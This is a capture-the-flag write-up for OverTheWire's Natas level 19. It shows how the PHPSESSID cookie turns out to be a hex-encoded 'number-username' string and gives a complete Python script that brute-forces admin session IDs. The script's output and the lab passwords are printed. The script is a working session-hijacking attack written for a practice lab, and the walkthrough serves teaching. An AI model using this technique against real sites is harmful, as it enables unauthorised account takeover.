Wargames - Natas 19

<< Previous challenge

Next challenge >>

Recommended reading:

• Previous challenge

From the credentials discovered from the previous challenge, head up to http://natas19.natas.labs.overthewire.org and take a look at its content.
Since this is a follow-up from the previous challenge, it'll be pretty short, the core is the same as the previous one, this one is more like a "find the differences" challenge, let's get to it.
Opening the page will show a  log in form like previously, but this time we got a bold text that says: "This page uses mostly the same code as the previous level, but session IDs are no longer sequential...". I'd advise you to forget this text, as reading it only confused me when watching how the session ID changed.
There's only thing we can actually do here, which is to log in, a good first thing to try is to log in without any credentials, just send an empty form. let's do this several times, deleting the PHPSESSID cookie between attempts, and this is how the cookie changed:

1 2 3 4 5 6 7 8

PHPSESSID=3632362d PHPSESSID=3335332d PHPSESSID=3138372d PHPSESSID=3534322d PHPSESSID=37322d PHPSESSID=3437352d PHPSESSID=3236372d PHPSESSID=34352d

I hope something stands out, although most of the numbers change, the last 2 characters are always the same, 0x2D, which is the hex value for '-' in ASCII. The rest of the characters are also numbers (pro-tip: 0x30 = 0, 0x39 = 9), so what we have are some numbers, so far we've seen 3 numbers, followed by a '-' (eg.: 626-, 353-). We can assume this is an hex encoded string. Now let's try to send a single letter as the username and see how the cookie changes:

1 2 3 4 5

PHPSESSID=3439322d61 PHPSESSID=3237352d62 PHPSESSID=3235322d63 PHPSESSID=3139312d6162 PHPSESSID=3337352d616263

What's being sent as username is, in order: a, b, c, ab, abc. Is it clear? after the '-', what we're getting is the username, encoded as well (61 = a, 62 = b, 63 = c). It's time to recall the useless function from the previous challenge, isValidAdminLogin, previously, this function didn't do anything, since we had access to the source code, it just returned FALSE, but maybe in this challenge it's not commented, so if the username is admin, it may return TRUE and give access? We can try to use admin as the username, but that by itself won't solve the challenge. What we're missing now is the correct session ID as well, just like in the previous level, so there's a session ID that's composed of a number (guessing from 1 to 640, like previously) followed by an '-', followed by admin. Something that looks like this: 123-admin, all hex encoded. Now that we know what we need to find, time to bring the script from the previous level, with some minor changes:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

# Created by Joao Godinho # October 2014 # Script to brute force level 19 of natas wargames # Refer to http://floatingbytes.blogspot.com for details # Library to work with the POST requests import requests # Our target URL target = 'http://natas19:4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs@natas19.natas.labs.overthewire.org/' # The magic words that tell's we got it acceptStr = "You are an admin." # Checking if we can connect to the target, just in case... r = requests.get(target) if r.status_code != requests.codes.ok: raise ValueError('Kabum? Couldn\'t connect to target :(') else: print 'Target reachable. Starting session brute force...' # Iterate each session and check if there's one with admin access for i in range(1,641): if i % 10 == 0: print 'Checked '+str(i)+' sessions...' cookies = dict(PHPSESSID=(str(i)+'-admin').encode('hex')) r = requests.get(target, cookies=cookies) # Did we find the right session? if r.content.find(acceptStr) != -1: print 'Got it! Session='+str(i) print r.content break print 'Done. Have fun!'

The only change is in line 25, on how the PHPSESSID cookie is built, running it produces the following:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76

Target reachable. Starting session brute force... Checked 10 sessions... Checked 20 sessions... Checked 30 sessions... Checked 40 sessions... Checked 50 sessions... Checked 60 sessions... Checked 70 sessions... Checked 80 sessions... Checked 90 sessions... Checked 100 sessions... Checked 110 sessions... Checked 120 sessions... Checked 130 sessions... Checked 140 sessions... Checked 150 sessions... Checked 160 sessions... Checked 170 sessions... Checked 180 sessions... Checked 190 sessions... Checked 200 sessions... Checked 210 sessions... Checked 220 sessions... Checked 230 sessions... Checked 240 sessions... Checked 250 sessions... Checked 260 sessions... Checked 270 sessions... Checked 280 sessions... Checked 290 sessions... Checked 300 sessions... Checked 310 sessions... Checked 320 sessions... Checked 330 sessions... Checked 340 sessions... Checked 350 sessions... Checked 360 sessions... Checked 370 sessions... Checked 380 sessions... Checked 390 sessions... Checked 400 sessions... Checked 410 sessions... Checked 420 sessions... Checked 430 sessions... Checked 440 sessions... Checked 450 sessions... Checked 460 sessions... Checked 470 sessions... Checked 480 sessions... Checked 490 sessions... Checked 500 sessions... Got it! Session=501 <html> <head> <!-- This stuff in the header has nothing to do with the level --> <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css"> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" /> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" /> <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script> <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script> <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script> <script>var wechallinfo = { "level": "natas19", "pass": "4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs" };</script></head> <body> <h1>natas19</h1> <div id="content"> <p> <b> This page uses mostly the same code as the previous level, but session IDs are no longer sequential... </b> </p> You are an admin. The credentials for the next level are:<br><pre>Username: natas20 Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF</pre></div> </body> </html> Done. Have fun!

501 tries later, we finally hit the right one, and there we go, on line 72 we have the password.

User	natas20
Password	eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF

A little more complex than the previous one, but still pretty accessible. A proper warm-up for what's coming.

Never Settle,

<< Previous challenge

Next challenge >>